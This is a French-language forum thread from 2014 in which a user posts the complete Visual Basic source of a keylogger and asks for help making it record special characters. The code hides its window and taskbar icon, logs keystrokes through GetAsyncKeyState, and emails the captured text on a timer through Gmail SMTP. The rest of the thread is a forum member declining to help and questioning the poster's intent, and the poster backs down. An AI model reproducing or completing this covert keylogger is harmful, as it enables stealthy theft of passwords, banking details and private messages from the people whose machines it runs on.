Problème keylogger et caractères spéciaux

Fermé
Vic@2 - Modifié par Vic@2 le 9/06/2014 à 18:49
 Vic@2 - 10 juin 2014 à 07:44
Hello !

Voilà mon pb :

Grâce à un tutoriel vidéo sur youtube j'ai créé un petit keylogger. Ce dernier enregistre donc les frappes et les envoie par email. Cependant il semblerait que les caractères spéciaux ne sont pas enregistrés correctement dans le keylogger et ne sont pas envoyés par email.
Ne connaissant pratiquement pas ce langage, je souhaitais savoir comment corriger cela afin qu'il puissent enregistrer et envoyer correctement les caractères spéciaux et si vous auriez l'amabilité de me fournir cette ligne de code manquante... ! ;)



Option Strict On
Imports System.Net.Mail
Public Class Form1
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer
    Private Sub tmrEmail_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles tmrEmail.Tick
        Try
            Dim SmtpServer As New SmtpClient
            SmtpServer.EnableSsl = True
            Dim mail As New MailMessage
            SmtpServer.Credentials = New Net.NetworkCredential("AdresseEmail", "motDePasse")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            mail = New MailMessage
            mail.From = New MailAddress("adresseEmail")
            mail.To.Add("adresseEmail")
            mail.Subject = ("New keylogger logs !")
            mail.Body = txtLogs.text
            SmtpServer.Send(mail)
        Catch ex As Exception
            Me.Close()
        End Try
    End Sub

    Private Sub TmrKeys_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TmrKeys.Tick
        Dim result As Integer
        Dim key As String
        Dim i As Integer

        For i = 2 To 90
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                key = Chr(i)
                If i = 13 Then key = vbNewLine
                Exit For
            End If
        Next i

        If key <> Nothing Then
            If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
                txtLogs.Text &= key
            Else
                txtLogs.Text &= key.ToLower
            End If
        End If

        If My.Computer.Keyboard.AltKeyDown AndAlso My.Computer.Keyboard.CtrlKeyDown AndAlso key = "K" Then
            Me.Visible = True
        End If

        If My.Computer.Keyboard.AltKeyDown AndAlso My.Computer.Keyboard.CtrlKeyDown AndAlso key = "K" AndAlso key = "F" Then
            Me.Visible = False
        End If

    End Sub

    Private Sub Form1_FormClosed(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosedEventArgs) Handles Me.FormClosed
        txtLogs.Text &= vbNewLine & "Keylogger stopped at: " & Now & vbNewLine
    End Sub

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Me.ShowInTaskbar = False
        Me.ShowIcon = False
        Me.Visible = False
        txtLogs.Text = "Keylogger started at: " & Now & vbNewLine

    End Sub
End Class



Merci d'avance ! :D


A voir également:

1 réponse

Polux31 Messages postés 6917 Date d'inscription mardi 25 septembre 2007 Statut Membre Dernière intervention 1 novembre 2016 1 204
9 juin 2014 à 19:10
Bonjour,

Tu ne connais pas ce langage mais tu fais quand même un keylogger qui transmet par email ce qui est tapé au clavier ... et bien sûr, c'est pour des raisons purement pédagogiques que tu veux faire ce petit programme ?
0
Bizarrement je m'attendait un peu à ce genre de réponse ! ;)
Je vais te répondre très simplement (ou pas !) : Tout d'abord, oui je n'y connait rien en Visual Basic mais lorsque l'on a une vidéo de ce genre : https://www.youtube.com/watch?v=AMjDmA5ZgkE , avec un minimum de bon sens et de connaissances en d'autres langages informatiques on arrive à se débrouiller plutôt pas mal.
Ensuite, j'ai bien conscience concernant l'illégalité de l'utilisation que POURRAIT avoir un keylogger. Et lorsque tu parles de raisons purement pédagogiques, tu ne crois pas si bien dire !
Lorsque l'on fait de la programmation (et je pense que tu dois bien mieux t'y connaître que moi, enfin j'espère ! :) on commence par créer des petits programmes de calculs, puis des logiciels, des navigateurs internet et parfois même de petits jeux-videos. Mais pour quelqu'un qui s'intéresse vraiment à la programmation parfois sa curiosité pour la sécurité informatique peut le pousser à s'intéresser au méthode de hacking et de piratage (pishing, keylogger...). Et c'est cela qui m'intéresse dans le domaine informatique.
Alors je comprend tout à fait ton point de vue mais plutôt que de recevoir une réponse comme la tienne, j'aurai préféré quelque chose de plus constructif qui m'aurait aidé à progresser, peut-être pas me donner la réponse (ce serait bien trop gentil de ta part !) mais justement à m'expliquer pourquoi je me trompe sur la vision que j'ai de l'informatique et des keyloggers...
Alors non je ne vais pas me servir de cet outil, qu'est le keylogger, pour voler les données bancaires ou les identifiants et mot de passe email d'un collège de bureau ou d'une quelconque autre personne (mais effectivement tu ne me connais pas assez pour juger de mes intentions !).

Alors merci quant même à toi pour ta réponse mais à l'avenir évite de te précipiter sur un topic concernant le domaine du hack pour simplement réprimander celui qui l'a écrit.

Bisous à toi et plein de petits coeurs ! ;)
0
Polux31 Messages postés 6917 Date d'inscription mardi 25 septembre 2007 Statut Membre Dernière intervention 1 novembre 2016 1 204
9 juin 2014 à 21:58
Ah bon, j'ai parlé de hack ou de malveillance ??? J'ai réprimandé quelqu'un ici ?
En principe, les individus malveillants savent se débrouiller tout seul et n'ont besoin de personnes.

Tu as quelque peu raison sur le fait qu'il faut un peu de bon sens et de connaissances, non pas avec d'autres langages, mais en programmation et en informatique plus généralement.

J'interviens sur les topics si je juge utile de le faire. Si ça ne te convient pas, tu peux toujours faire une alerte aux modérateurs.
0
Ah enfin je te retrouve mon petit Polux ! Et loin de moi l'idée de te signaler au modérateurs, quels raisons aurai-je de le faire ?

Bon alors s'il n'est ni question de malveillance ou de hack serait-il possible que tu m'apporte ta précieuse aide ? ;)
0
Polux31 Messages postés 6917 Date d'inscription mardi 25 septembre 2007 Statut Membre Dernière intervention 1 novembre 2016 1 204
9 juin 2014 à 23:21
D'abord je ne suis pas ton petit polux ensuite comme tu l'as si bien dit :
"... avec un minimum de bon sens et de connaissances en d'autres langages informatiques on arrive à se débrouiller plutôt pas mal." ... je te laisse donc faire usage de ton bon sens et de tes connaissances en d'autres langages ...

Et puis, mettre ça sur un forum, à la disposition du premier malveillant venu ... ton bon sens conviendra que ce n'est pas très convenable !!! et surtout contraire à charte de CCM.
0
Si je poste sur ce forum, c'est que mon "bon sens et mes connaissances" en Visual Basic s'arrête là. Mais tu as peu-être raison, je vais me mettre à l'apprentissage de ce langage.
Après tout, on n'est jamais aussi bien servis que par soi-même...! ;)

Malgré que le téléchargement de keyloggers est d'une simplicité enfantine sur le net, je n'aurai pas dû poster ce code sur ce forum.
Et désolé pour le "mon petiti Polux", ce fut déplacé de ma part.

En tout cas bonne continuation sur ce forum où tu sembles y être assez actif et avec souvent de bons conseils.

A plus ;)
0